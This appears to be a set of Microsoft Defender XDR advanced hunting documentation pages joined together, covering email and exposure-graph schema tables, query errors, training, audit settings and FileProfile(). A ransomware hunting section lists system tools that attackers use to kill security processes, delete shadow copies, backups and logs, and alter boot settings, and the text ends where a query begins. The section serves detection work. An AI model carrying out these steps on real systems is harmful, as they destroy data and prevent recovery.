-| `BulkComplaintLevel` | `int` | Threshold assigned to email from bulk mailers, a high bulk complaint level (BCL) means the email is more likely to generate complaints, and thus more likely to be spam |
-| `EmailAction` | `string` | Final action taken on the email based on filter verdict, policies, and user actions: Move message to junk mail folder, Add X-header, Modify subject, Redirect message, Delete message, send to quarantine, No action taken, Bcc message |
-| `EmailActionPolicy` | `string` | Action policy that took effect: Antispam high-confidence, Antispam, Antispam bulk mail, Antispam phishing, Anti-phishing domain impersonation, Anti-phishing user impersonation, Anti-phishing spoof, Anti-phishing graph impersonation, Antimalware, Safe Attachments, Enterprise Transport Rules (ETR) |
-| `EmailActionPolicyGuid` | `string` | Unique identifier for the policy that determined the final mail action |
-| `AuthenticationDetails` | `string` | List of pass or fail verdicts by email authentication protocols like DMARC, DKIM, SPF or a combination of multiple authentication types (CompAuth) |
-| `AttachmentCount` | `int` | Number of attachments in the email |
-| `UrlCount` | `int` | Number of embedded URLs in the email |
-| `EmailLanguage` | `string` | Detected language of the email content |
-| `Connectors` | `string` | Custom instructions that define organizational mail flow and how the email was routed |
-| `OrgLevelAction` | `string` | Action taken on the email in response to matches to a policy defined at the organizational level |
-| `OrgLevelPolicy` | `string` | Organizational policy that triggered the action taken on the email |
-| `UserLevelAction` | `string` | Action taken on the email in response to matches to a mailbox policy defined by the recipient |
-| `UserLevelPolicy` | `string` | End-user mailbox policy that triggered the action taken on the email |
-| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AdditionalFields` | `string` | Additional information about the entity or event |
-| `LatestDeliveryLocation`* | `string` | Last known location of the email |
-|`LatestDeliveryAction`* | `string` | Last known action attempted on an email by the service or by an admin through manual remediation |
-
-> [!NOTE]
->\* The `LatestDeliveryLocation` and `LatestDeliveryAction` columns are **not** available in the Streaming API.
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Emailpostdeliveryevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table.md
- Title: EmailPostDeliveryEvents table in the advanced hunting schema
-description: Learn about post-delivery actions taken on Microsoft 365 emails in the EmailPostDeliveryEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# EmailPostDeliveryEvents
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `EmailPostDeliveryEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about post-delivery actions taken on email messages processed by Microsoft 365. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-To get more information about individual email messages, you can also use the [`EmailEvents`](advanced-hunting-emailevents-table.md), [`EmailAttachmentInfo`](advanced-hunting-emailattachmentinfo-table.md), and the [`EmailUrlInfo`](advanced-hunting-emailurlinfo-table.md) tables. For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `NetworkMessageId` | `string` | Unique identifier for the email, generated by Microsoft 365 |
-| `InternetMessageId` | `string` | Public-facing identifier for the email that is set by the sending email system |
-| `Action` | `string` | Action taken on the entity |
-| `ActionType` | `string` | Type of activity that triggered the event: Manual remediation, Phish ZAP, Malware ZAP |
-| `ActionTrigger` | `string` | Indicates whether an action was triggered by an administrator (manually or through approval of a pending automated action), or by some special mechanism, such as a ZAP or Dynamic Delivery |
-| `ActionResult` | `string` | Result of the action |
-| `RecipientEmailAddress` | `string` | Email address of the recipient, or email address of the recipient after distribution list expansion |
-| `DeliveryLocation` | `string` | Location where the email was delivered: Inbox/Folder, On-premises/External, Junk, Quarantine, Failed, Dropped, Deleted items |
-| `ThreatTypes` | `string` | Verdict from the email filtering stack on whether the email contains malware, phishing, or other threats |
-| `DetectionMethods` | `string` | Methods used to detect malware, phishing, or other threats found in the email |
-| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-
-## Supported event types
-
-This table captures events with the following `ActionType` values:
--- **Manual remediation** ΓÇô An administrator manually took action on an email message after it was delivered to the user mailbox. This includes actions taken manually through [Threat Explorer](../office-365-security/threat-explorer-real-time-detections-about.md) or approvals of [automated investigation and response (AIR) actions](m365d-autoir-actions.md).-- **Phish ZAP** ΓÇô [Zero-hour auto purge (ZAP)](../office-365-security/zero-hour-auto-purge.md) took action on a phishing email after delivery.-- **Malware ZAP** ΓÇô Zero-hour auto purge (ZAP) took action on an email message found containing malware after delivery.-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Emailurlinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-emailurlinfo-table.md
- Title: EmailUrlInfo table in the advanced hunting schema
-description: Learn about URL or link information in the EmailUrlInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# EmailUrlInfo
---
-**Applies to:**
-- Microsoft Defender XDR--
-The `EmailUrlInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about URLs on emails and attachments processed by Microsoft Defender for Office 365. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `NetworkMessageId` | `string` | Unique identifier for the email, generated by Microsoft 365 |
-| `Url` | `string` | Full URL in the email subject, body, or attachment |
-| `UrlDomain` | `string` | Domain name or host name of the URL |
-| `UrlLocation` | `string` | Indicates which part of the email the URL is located |
-| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns |
-
-> [!TIP]
-> To hunt for attacks based on URLs embedded within QR codes, users can leverage the UrlLocation column having "QRCode" as an identifier for URLs extracted from QR codes.
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Errors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-errors.md
- Title: Handle errors in advanced hunting for Microsoft Defender XDR
-description: Understand errors displayed when using advanced hunting
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# Handle advanced hunting errors
---
-**Applies to:**
-- Microsoft Defender XDR--
-Advanced hunting displays errors to notify for syntax mistakes and whenever queries hit [predefined quotas and usage parameters](advanced-hunting-limits.md). Refer to the table below for tips on how to resolve or avoid errors.
-
-| Error type | Cause | Resolution | Error message examples |
-|--|--|--|--|
-| Syntax errors | The query contains unrecognized names, including references to nonexistent operators, columns, functions, or tables. | Ensure references to [Kusto operators and functions](/azure/data-explorer/kusto/query/) are correct. Check [the schema](advanced-hunting-schema-tables.md) for the correct advanced hunting columns, functions, and tables. Enclose variable strings in quotes so they are recognized. While writing your queries, use the autocomplete suggestions from IntelliSense. | `A recognition error occurred.` |
-| Semantic errors | While the query uses valid operator, column, function, or table names, there are errors in its structure and resulting logic. In some cases, advanced hunting identifies the specific operator that caused the error. | Check for errors in the structure of query. Refer to [Kusto documentation](/azure/data-explorer/kusto/query/) for guidance. While writing your queries, use the autocomplete suggestions from IntelliSense. | `'project' operator: Failed to resolve scalar expression named 'x'`|
-| Timeouts | A query can only run within a [limited period before timing out](advanced-hunting-limits.md). This error can happen more frequently when running complex queries. | [Optimize the query](advanced-hunting-best-practices.md) | `Query exceeded the timeout period.` |
-| CPU throttling | Queries in the same tenant have exceeded the [CPU resources](advanced-hunting-limits.md) that have been allocated based on tenant size. | The service checks CPU resource usage every 15 minutes and daily and displays warnings after usage exceeds 10% of the allocated quota. If you reach 100% utilization, the service blocks queries until after the next daily or 15-minute cycle. [Optimize your queries to avoid hitting CPU quotas](advanced-hunting-best-practices.md) | - `This query used X% of your organization's allocated resources for the current 15 minutes.`<br>- `You have exceeded processing resources allocated to this tenant. You can run queries again in <duration>.` |
-| Result size limit exceeded | The aggregate size of the result set for the query has exceeded the maximum size. This error can occur if the result set is so large that truncation at the 10,000-record limit can't reduce it to an acceptable size. Results that have multiple columns with sizable content are more likely to be impacted by this error. | [Optimize the query](advanced-hunting-best-practices.md) | `Result size limit exceeded. Use "summarize" to aggregate results, "project" to drop uninteresting columns, or "take" to truncate results.` |
-| Excessive resource consumption | The query has consumed excessive amounts of resources and has been stopped from completing. In some cases, advanced hunting identifies the specific operator that wasn't optimized. | [Optimize the query](advanced-hunting-best-practices.md) | -`Query stopped due to excessive resource consumption.`<br>-`Query stopped. Adjust use of the <operator name> operator to avoid excessive resource consumption.` |
-| Unknown errors | The query failed because of an unknown reason. | Try running the query again. Contact Microsoft through the portal if queries continue to return unknown errors. | `An unexpected error occurred during query execution. Please try again in a few minutes.`
---
-## Related topics
-- [Advanced hunting best practices](advanced-hunting-best-practices.md)-- [Quotas and usage parameters](advanced-hunting-limits.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Kusto Query Language overview](/azure/data-explorer/kusto/query/)
security Advanced Hunting Expert Training https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-expert-training.md
- Title: Get expert training on advanced hunting
-description: Free training and guidance from advanced hunting experts
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# Get expert training on advanced hunting
--
-**Applies to:**
--- Microsoft Defender XDR-
-Boost your knowledge of advanced hunting quickly with _Tracking the adversary_, a webcast series for new security analysts and seasoned threat hunters. The series guides you through the basics all the way to creating your own sophisticated queries. Start with the first video on fundamentals or jump to more advanced videos that suit your level of experience.
-
-| Title | Description | Watch | Queries |
-|||||
-| Episode 1: KQL fundamentals | This episode covers the basics of advanced hunting in Microsoft Defender XDR. Learn about available advanced hunting data and basic KQL syntax and operators. | [YouTube](https://youtu.be/0D9TkGjeJwM?t=351) (54:14) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.txt) |
-| Episode 2: Joins | Continue learning about data in advanced hunting and how to join tables together. Learn about `inner`, `outer`, `unique`, and `semi` joins, and understand the nuances of the default Kusto `innerunique` join. | [YouTube](https://youtu.be/LMrO6K5TWOU?t=297) (53:33) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.txt) |
-| Episode 3: Summarizing, pivoting, and visualizing data | Now that you've learned to filter, manipulate, and join data, it's time to summarize, quantify, pivot, and visualize. This episode discusses the `summarize` operator and various calculations, while introducing additional tables in the schema. You'll also learn to turn datasets into charts that can help you extract insight. | [YouTube](https://youtu.be/UKnk9U1NH6Y?t=296) (48:52) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.txt) |
-| Episode 4: Let's hunt! Applying KQL to incident tracking | In this episode, you learn to track some attacker activity. We use our improved understanding of Kusto and advanced hunting to track an attack. Learn actual tricks used in the field, including the ABCs of cybersecurity and how to apply them to incident response. | [YouTube](https://youtu.be/2EUxOc_LNd8?t=291) (59:36) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.txt)
-
-Get more expert training with *L33TSP3AK: Advanced hunting in Microsoft Defender XDR*, a webcast series for analysts looking to expand their technical knowledge and practical skills in conducting security investigations using advanced hunting in Microsoft Defender XDR.
-
-| Title | Description | Watch | Queries |
-|||||
-| Episode 1 | In this episode, you will learn different best practices in running advanced hunting queries. Among the topics covered are: how to optimize your queries, use advanced hunting for ransomware, handle JSON as a dynamic type, and work with external data operators. | [YouTube](https://www.youtube.com/watch?v=nMGbK-ALaVg&feature=youtu.be) (56:34) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/l33tSpeak/Performance%2C%20Json%20and%20dynamics%20operator%2C%20external%20data.txt) |
-| Episode 2 | In this episode, you will learn how to investigate and respond to suspicious or unusual logon locations and data exfiltration via inbox forwarding rules. Sebastien Molendijk, Senior Program Manager for Cloud Security CxE, shares how to use advanced hunting to investigate multi-stage incidents with Microsoft Defender for Cloud Apps data. | [YouTube](https://www.youtube.com/watch?v=QaUxdtNfbd8) (57:07) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/l33tSpeak/MCAS%20-%20The%20Hunt.txt)
-| Episode 3 | In this episode we will cover the latest improvements to advanced hunting, how to import an external data source into your query, and how to use partitioning to segment large query results into smaller result sets to avoid hitting API limits. | [YouTube](https://www.youtube.com/watch?v=vd5lgIJKmYs) (40:59) | [Text file](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Webcasts/l33tSpeak/l33tspeak%2011%20Oct%202021%20-%20externaldata%20and%20query%20partitioning.csl)
-
-## How to use the CSL file
-
-Before starting an episode, access the corresponding [text file on GitHub](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Webcasts) and copy its contents to the advanced hunting query editor. As you watch an episode, you can use the copied contents to follow the speaker and run queries.
-
-The following excerpt from a text file containing the queries shows a comprehensive set of guidance marked as comments with `//`.
-
-```kusto
-// DeviceLogonEvents
-// A table containing a row for each logon a device enrolled in Microsoft Defender for Endpoint
-// Contains
-// - Account information associated with the logon
-// - The device which the account logged onto
-// - The process which performed the logon
-// - Network information (for network logons)
-// - Timestamp
-```
-
-The same text file includes queries before and after the comments as shown below. To run a specific query with [multiple queries in the editor](advanced-hunting-query-language.md#work-with-multiple-queries-in-the-editor), move the cursor to that query and select **Run query**.
-
-```kusto
-DeviceLogonEvents
-| count
-
-// DeviceLogonEvents
-// A table containing a row for each logon a device enrolled in Microsoft Defender for Endpoint
-// Contains
-// - Account information associated with the logon
-// - The device which the account logged onto
-// - The process which performed the logon
-// - Network information (for network logons)
-// - Timestamp
-
-CloudAppEvents
-| take 100
-| sort by Timestamp desc
-```
--
-## Other resources
-
-| Title | Description | Watch |
-||||
-|Joining tables in KQL | Learn the power of joining tables in creating meaningful results. | [YouTube](https://www.youtube.com/watch?v=8qZx7Pp5XgM) (4:17) |
-| Optimizing tables in KQL | Learn how to avoid timeouts when running complex queries by optimizing your queries. | [YouTube](https://www.youtube.com/watch?v=ceYvRuPp5D8) (5:38) |
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the advanced hunting query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Exposuregraphedges Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-exposuregraphedges-table.md
- Title: ExposureGraphEdges table in the advanced hunting schema
-description: Learn about the ExposureGraphEdges table of the advanced hunting schema, which provides attack surface information, to help you understand how potential threats might reach, and compromise, valuable assets.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 03/13/2024--
-# ExposureGraphEdges
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Security Exposure Management (public preview)--
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The `ExposureGraphEdges` table in the [advanced hunting](advanced-hunting-overview.md) schema provides visibility into relationships between entities and assets in the enterprise exposure graph. This visibility can help uncover critical organizational assets and explore entity relationships and attack paths. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `EdgeId` | `string` | Unique identifier for the relationship/edge |
-| `EdgeLabel` | `string` | The edge label like "routes traffic to" |
-| `SourceNodeId` | `string` | Node ID of the edge's source |
-| `SourceNodeName` | `string` | Source node display name |
-| `SourceNodeLabel` | `string` | Source node label |
-| `SourceNodeCategories` | `dynamic` | Categories list of the source node in JSON format |
-| `TargetNodeId` | `string` | Node ID of the edge's target |
-| `TargetNodeName` | `string` | Display name of the target node |
-| `TargetNodeLabel` | `string` | Target node label |
-| `TargetNodeCategories` | `dynamic` | The categories list of the target node in JSON format |
-| `EdgeProperties` | `dynamic` | Optional data relevant for the relationship between the nodes in JSON format |
-
-## Related articles
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Query the enterprise exposure graph](/security-exposure-management/query-enterprise-exposure-graph)
security Advanced Hunting Exposuregraphnodes Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-exposuregraphnodes-table.md
- Title: ExposureGraphNodes table in the advanced hunting schema
-description: Learn about the ExposureGraphNodes table of the advanced hunting schema, which provides attack surface information, to help you understand how potential threats might reach, and compromise, valuable assets.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 03/12/2024--
-# ExposureGraphNodes
--
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Security Exposure Management (public preview)-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The `ExposureGraphNodes` table in the [advanced hunting](advanced-hunting-overview.md) schema contains organizational entities and their properties. These include entities like devices, identities, user groups, and cloud assets such as virtual machines (VMs), storage, and containers. Each node corresponds to an individual entity and encapsulates information about its characteristics, attributes, and security related insights within the organizational structure. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `NodeId` | `string` | Unique node identifier |
-| `NodeLabel` | `string` | Node label |
-| `NodeName` |`string` | Node display name |
-| `Categories` |`dynamic` | Categories of the node in JSON format |
-| `NodeProperties` |`dynamic` | Properties of the node, including insights related to the resource, such as whether the resource is exposed to the internet, or vulnerable to remote code execution. Values are JSON formatted raw data (unstructured). |
-| `EntityIds` | `dynamic` | All known node identifiers in JSON format |
-
-## Related articles
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Query the enterprise exposure graph](/security-exposure-management/query-enterprise-exposure-graph)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Extend Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-extend-data.md
- Title: Extend advanced hunting coverage with the right settings
-description: Check auditing settings on Windows devices and other settings to help ensure that you get the most comprehensive data in advanced hunting
--
- - NOCSH
------ m365-security-- tier2- Previously updated : 02/16/2024--
-# Extend advanced hunting coverage with the right settings
---
-**Applies to:**
-- Microsoft Defender XDR-
-[Advanced hunting](advanced-hunting-overview.md) relies on data coming from various sources, including your devices, your Office 365 workspaces, Microsoft Entra ID, and Microsoft Defender for Identity. To get the most comprehensive data possible, ensure that you have the correct settings in the corresponding data sources.
-
-## Advanced security auditing on Windows devices
-Turn on these advanced auditing settings to ensure you get data about activities on your devices, including local account management, local security group management, and service creation.
-
-| Data | Description | Schema table | How to configure |
-| | | | |
-| Account management | Events captured as various `ActionType` values indicating local account creation, deletion, and other account-related activities | [DeviceEvents](advanced-hunting-deviceevents-table.md) | - Deploy an advanced security audit policy: [Audit User Account Management](/windows/security/threat-protection/auditing/audit-user-account-management)<br> - [Learn about advanced security audit policies](/windows/security/threat-protection/auditing/advanced-security-auditing) |
-| Security group management | Events captured as various `ActionType` values indicating local security group creation and other local group management activities | [DeviceEvents](advanced-hunting-deviceevents-table.md) | - Deploy an advanced security audit policy: [Audit Security Group Management](/windows/security/threat-protection/auditing/audit-security-group-management)<br> - [Learn about advanced security audit policies](/windows/security/threat-protection/auditing/advanced-security-auditing) |
-| Service installation | Events captured with the `ActionType` value `ServiceInstalled`, indicating that a service has been created | [DeviceEvents](advanced-hunting-deviceevents-table.md) | - Deploy an advanced security audit policy: [Audit Security System Extension](/windows/security/threat-protection/auditing/audit-security-system-extension)<br> - [Learn about advanced security audit policies](/windows/security/threat-protection/auditing/advanced-security-auditing) |
-
-## Microsoft Defender for Identity sensor on the domain controller
-If you're running Active Directory on premises, you need to install the Microsoft Defender for Identity sensor on the domain controller to get data for Microsoft Defender for Identity. When installed and properly configured, this data also feeds into advanced hunting through Microsoft Defender for Identity and provides a more holistic picture of identity information and events in your network. This data also enhances the ability of Microsoft Defender for Identity to generate relevant alerts that are also covered by advanced hunting.
-
-| Data | Description | Schema table | How to configure |
-| | | | |
-| Domain controller | Data from on-premises Active Directory sent to Microsoft Defender for Identity, enriching identity-related information, such as account details, logon activity, and Active Directory queries | Multiple tables, including [IdentityInfo](advanced-hunting-identityinfo-table.md), [IdentityLogonEvents](advanced-hunting-identitylogonevents-table.md), and [IdentityQueryEvents](advanced-hunting-identityqueryevents-table.md) | - [Install the Microsoft Defender for Identity sensor](/azure-advanced-threat-protection/install-atp-step4)<br>- [Turn on relevant Windows Events](/azure-advanced-threat-protection/configure-event-collection) |
-
-> [!NOTE]
-> Some tables in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Understand the schema](advanced-hunting-schema-tables.md)
security Advanced Hunting Fileprofile Function https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-fileprofile-function.md
- Title: FileProfile() function in advanced hunting for Microsoft Defender XDR
-description: Learn how to use the FileProfile() to enrich information about files in your advanced hunting query results
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# FileProfile()
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `FileProfile()` function is an enrichment function in [advanced hunting](advanced-hunting-overview.md) that adds the following data to files found by the query.
-
-| Column | Data type | Description |
-|||-|
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to |
-| `MD5` | `string` | MD5 hash of the file that the recorded action was applied to |
-| `FileSize` | `int` | Size of the file in bytes |
-| `GlobalPrevalence` | `int` | Number of instances of the entity observed by Microsoft globally |
-| `GlobalFirstSeen` | `datetime` | Date and time when the entity was first observed by Microsoft globally |
-| `GlobalLastSeen` | `datetime` | Date and time when the entity was last observed by Microsoft globally |
-| `Signer` | `string` | Information about the signer of the file |
-| `Issuer` | `string` | Information about the issuing certificate authority (CA) |
-| `SignerHash` | `string` | Unique hash value identifying the signer |
-| `IsCertificateValid` | `boolean` | Whether the certificate used to sign the file is valid |
-| `IsRootSignerMicrosoft` | `boolean` | Indicates whether the signer of the root certificate is Microsoft and the file is built in to Windows OS |
-| `SignatureState` | `string` | State of the file signature: SignedValid - the file is signed with a valid signature, SignedInvalid - the file is signed but the certificate is invalid, Unsigned - the file isn't signed, Unknown - information about the file can't be retrieved
-| `IsExecutable` | `boolean` | Whether the file is a Portable Executable (PE) file |
-| `ThreatName` | `string` | Detection name for any malware or other threats found |
-| `Publisher` | `string` | Name of the organization that published the file |
-| `SoftwareName` | `string` | Name of the software product |
-| `ProfileAvailability` | `string` | Indicates the availability status of the profile data for the file: Available - profile was successfully queried and file data returned, Missing - profile was successfully queried but no file info was found, Error - error in querying the file info or maximum allotted time was exceeded before query could be completed, or an empty value - if file ID is invalid or the maximum number of files was reached |
----
-## Syntax
-
-```kusto
-invoke FileProfile(x,y)
-```
-
-## Arguments
--- **x**ΓÇöfile ID column to use: `SHA1`, `SHA256`, `InitiatingProcessSHA1`, or `InitiatingProcessSHA256`; function uses `SHA1` if unspecified-- **y**ΓÇölimit to the number of records to enrich, 1-1000; function uses 100 if unspecified--
-> [!TIP]
-> Enrichment functions will show supplemental information only when they are available. Availability of information is varied and depends on a lot of factors. Make sure to consider this when using FileProfile() in your queries or in creating custom detections. For best results, we recommend using the FileProfile() function with SHA1.
-
-## Examples
-
-### Project only the SHA1 column and enrich it
-
-```kusto
-DeviceFileEvents
-| where isnotempty(SHA1) and Timestamp > ago(1d)
-| take 10
-| project SHA1
-| invoke FileProfile()
-```
-
-### Enrich the first 500 records and list low-prevalence files
-
-```kusto
-DeviceFileEvents
-| where ActionType == "FileCreated" and Timestamp > ago(1d)
-| project CreatedOn = Timestamp, FileName, FolderPath, SHA1
-| invoke FileProfile("SHA1", 500)
-| where GlobalPrevalence < 15
-```
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Get more query examples](advanced-hunting-shared-queries.md)
security Advanced Hunting Find Ransomware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-find-ransomware.md
- Title: Find ransomware with advanced hunting
-description: Use advanced hunting to locate devices potentially affected by ransomware.
--
- - NOCSH
----
- - m365-security
- - m365solution-ransomware
- - highpri
- - tier1
- Previously updated : 02/16/2024--
-# Hunt for ransomware
--
-**Applies to:**
-- Microsoft Defender XDR-
-Ransomware evolved rapidly from being simple commodity malware affecting individual computer users to an enterprise threat that is severely impacting industries and government institutions. While [Microsoft Defender XDR](microsoft-365-defender.md) provides many capabilities that detect and block ransomware and associated intrusion activities, performing proactive checks for signs of compromise can help keep your network protected.
-
-> [Read about human-operated ransomware](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/)
-
-With [advanced hunting](advanced-hunting-overview.md) in Microsoft Defender XDR, you can create queries that locate individual artifacts associated with ransomware activity. You can also run more sophisticated queries that can look for signs of activity and weigh those signs to find devices that require immediate attention.
-
-## Signs of ransomware activity
-
-Microsoft security researchers have observed various common yet subtle artifacts in many ransomware campaigns launched by sophisticated intruders. These signs mostly involve use of system tools to prepare for encryption, prevent detection, and clear forensic evidence.
-
-| Ransomware activity | Common tools | Intent |
-|--|--|--|
-| Stop processes | _taskkill.exe_, _net stop_ | Ensure files targeted for encryption aren't locked by various applications. |
-| Turn off services | _sc.exe_ | - Ensure files targeted for encryption aren't locked by various applications.<br>- Prevent security software from disrupting encryption and other ransomware activity.<br>- Stop backup software from creating recoverable copies. |
-| Delete logs and files | _cipher.exe_, _wevtutil_, _fsutil.exe_ | Remove forensic evidence. |
-| Delete shadow copies | _vsadmin.exe_, _wmic.exe_ | Remove drive shadow copies that can be used to recover encrypted files. |
-| Delete and stop backups | _wbadmin.exe_ | Delete existing backups and stop scheduled backup tasks, preventing recovery after encryption. |
-| Modify boot settings | _bcdedit.exe_ | Turn off warnings and automatic repairs after boot failures that can be caused by the encryption process. |
-| Turn off recovery tools | _schtasks.exe_, _regedit.exe_, | Turn off System Restore and other system recovery options. |
-
-## Check for individual signs of ransomware activity
-
-Many activities that constitute ransomware behavior, including the activities described in the preceding section, can be benign. When using the following queries to locate ransomware, run more than one query to check whether the same devices are exhibiting various signs of possible ransomware activity.
-
-### Stopping multiple processes using _taskkill.exe_
-
-This query checks for attempts to stop at least 10 separate processes using the _taskkill.exe_ utility. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2RS2vCUBCFz7rgfwiuIkit3eumVSgtpYvuS9SLDTY2eLUvxN_eb8YHKlFkyNzJzDkn505aailRX7mmGlFlmhNBhUrOSGeuT3L0s6QqNaMagolEcMyCbApjx2e8TYhcH8Q1mB-emq50z_lF39gvBzo9-gEF-6Yhlyh9653ejCfRK6zCsaZfuJOu-x2jkqqN-0Yls-8-gp6dZ52OVuT6Sad1plulyN0KIkMt15_zt7zHDe8OBwv3btoJToa7Tnp0T8Ou9WzfT761gPOm3_FQ16Zxp2qcCdg33_rlyokG-iXv7_4BRNMnhkortmvTW6rqnZ7bgP2Vtm70D3d9wcFaAgAA&runQuery=true&timeRangeId=week)
-
-```kusto
